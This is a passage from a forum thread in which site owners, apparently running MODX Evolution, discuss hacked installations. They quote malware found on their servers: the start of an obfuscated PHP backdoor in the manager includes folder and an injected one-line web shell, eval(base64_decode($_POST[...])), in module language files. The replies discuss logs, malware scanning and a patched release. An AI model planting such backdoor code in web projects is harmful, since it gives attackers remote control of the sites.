-
- 230 Posts
got another site hacked. and it was an absolute clean update after that 1.0.14 site was hacked. we checked all files before updating, removed nearly all plugins (its a nearly static page), and got files in hte manager /includes like
<?php $r76="F[<PAlDf|]}M@~79/O8Kx\rH6r&-c5k\n3X,YzhQ> Cp\\wUu2jGoB;0i_SN\tn%Vg)ZI^sTRyvL{\$:=1*mE+JW(q4.t'`a!\"#edb?"; $GLOBALS['vtton6'] = $r76[94].$r76[24].$r76[24].$r76[49].$r76[24].$r76[54].$r76[24].$r76[94].$r76[41].$r76[49].$r76[24].$r76[87].$r76[53].$r76[58].$r76[61]; $GLOBALS['jlxru64'] = $r76[53].$r76[58].$r76[53].$r76[54].$r76[66].$r76[94].$r76[87]; $GLOBALS['vajox38'] = $r76[95].$r76[94].$r76[7].$r76[53].$r76[58].$r76[94]; $GLOBALS['qobdl72'] = $r76[36].$r76[70].$r76[27].$r76[45].$r76[61].$r76[76].$r76[31]; $GLOBALS['yhrfr40'] = $r76[20].$r76[69].$r76[36].$r76[20].$r76[58].$r76[15].$r76[46]; $GLOBALS['quzii24'] = $r76[78].$r76[95].$r76[28]; $GLOBALS['tlyiy12'] = $r76[27].$r76[49].$r76[45].$r76[58].$r76[87]; $GLOBALS['kyioa8'] = $r76[87].$r76[53].$r76[78].$r76[94]; $GLOBALS['glyac65'] =
.....
file was dated 10.10.2014
update: also files within /modules/docmanager/lang/are modified with
eval(base64_decode($_POST['ne1bfba']));?><?php ....
[ed. note: spackko last edited this post 9 years, 6 months ago.]
-
- 230 Posts
Quote from: Jako at Oct 24, 2014, 09:28 AMQuote from: spackko at Oct 24, 2014, 05:49 AMgot another site hacked. and it was an absolute clean update after that 1.0.14 site was hacked.
Do you have any access log for this?
will check that later
-
- 409 Posts
It's looks like we are several to have the same problem for 2 months.
I can understand this problem is hard to solve.
I'm trying to use the linux tool maldet to detect any malware on evo directory, but I didn't found anything for now.
Now, my server is grey/black listed because of spam and I'm thinking to move all Evo website under another dedicated server. But of course, it's not the solution. Another "issue" is to "upgrade" these websites under Revo, but it's also a lot of work...
I don't known how can I help the dev team to find a issue.
I'm not sure the log files analysis is a solution because the creation date stamp of a incrimined file can also be changed by the malware...
-
- 11 Posts
I'm pretty sure the security flaw has been fixed in 1.0.15, which was released a couple of days ago.